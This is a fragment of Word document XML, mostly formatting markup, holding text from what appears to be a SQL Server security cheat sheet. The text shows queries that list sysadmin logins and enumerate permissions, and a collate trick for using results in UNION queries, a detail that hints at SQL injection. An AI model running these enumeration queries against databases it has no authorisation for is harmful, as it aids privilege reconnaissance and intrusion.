          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>select name from master..syslogins where sysadmin =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Style w:val="6"/>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>From Daniele Costa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Tips on using fn_my_permissions in 2005, 2008 – included in table above.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Also:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>To check permissions on multiple database you will have to use the following pattern.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2" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, ‘DATABASE’)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Note also that in case of using this data with a UNION query a collation error could occur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>In this case a simple trick is to use the following syntax:</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2" w:lineRule="atLeast"/>
        <w:ind w:left="720" w:right="720"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:caps w:val="0"/>
          <w:color w:val="4C5356"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>select permission_name collate database_default FROM fn_my_permissions (NULL, ‘DATABASE’)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Brush Script MT">
    <w:panose1 w:val="0306080204040607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74254"/>
    <w:rsid w:val="07A0159E"/>
    <w:rsid w:val="17894115"/>
    <w:rsid w:val="18AA48D0"/>
    <w:rsid w:val="1A8C24BA"/>
    <w:rsid w:val="314C0244"/>
    <w:rsid w:val="4BFB769C"/>
    <w:rsid w:val="569547E7"/>
    <w:rsid w:val="78E44E5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Arial" w:hAnsi="Arial" w:eastAsia="宋体"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13840</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-01-20T02:16:21Z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